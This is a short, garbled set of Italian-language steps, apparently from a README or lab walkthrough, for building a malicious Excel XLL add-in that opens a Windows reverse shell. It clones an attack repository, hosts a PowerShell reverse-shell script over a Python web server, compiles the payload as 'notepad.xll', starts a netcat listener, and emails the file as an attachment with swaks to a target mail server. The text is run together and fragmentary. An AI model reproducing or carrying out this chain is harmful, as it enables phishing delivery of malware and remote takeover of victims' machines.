
xll windows reverse shell
xll reverse shell per Windows
git clone https://github.com/n3rdh4x0r/xll_windows_reverse_shell.git
revsh.ps1python3 -m http.server 9999
notpadXLL.c sulla tua macchina attaccante Windows e aggiorna notpadXLL.c di conseguenza.x64 Native Tools Command Prompt for VS 2022notepad.xllcl.exe /LD notepadXLL.c /link /out:notepad.xll

notepad.xll sulla tua macchina Kaliswaks curl -O https://jetmore.org/john/code/swaks/files/swaks-20240103.0/swaks
nc -nlvp 4444
swaks per inviare un'email con notepad.xll allegato:./swaks --to [email protected] --from [email protected] --server 10.10.11.21 --port 25 --header "Subject: test" --body "test" --attach @notepad.xll
